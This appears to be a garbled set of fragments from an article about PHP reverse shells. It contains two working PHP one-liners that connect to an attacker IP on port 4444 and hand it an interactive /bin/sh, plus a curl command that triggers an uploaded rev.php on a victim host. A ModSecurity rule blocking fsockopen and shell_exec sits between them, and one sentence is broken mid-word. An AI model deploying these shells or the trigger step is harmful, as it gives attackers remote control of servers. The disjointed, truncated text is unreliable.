<?= $c=fsockopen("10.0.0.1",4444);$d=exec("/bin/sh -i <&3 >&3 2>&3"); ?>

<?php $sock = pfsockopen("192.168.1.10", 4444); $proc = proc_open("/bin/sh -i", [0=>$sock,1=>$sock,2=>$sock], $pipes); ?>

return false;

SecRule REQUEST_FILENAME "\.php$" "chain,deny,id:10001" SecRule REQUEST_BODY|ARGS "(fsockopen|pfsockopen|shell_exec|system|`.*`)" "t:lowercase"

This is a , not a reverse shell. It requires sending parameters via HTTP.

In the world of cybersecurity, few terms evoke as much tension as "Reverse Shell." For penetration testers (ethical hackers), it is a golden standard for gaining control over a remote server. For malicious actors, it is a primary tool for persistence and lateral movement. When you combine this technique with the world's most popular server-side scripting language—PHP—you get a potent, flexible, and often hard-to-detect backdoor.

curl http://victim.com/uploads/rev.php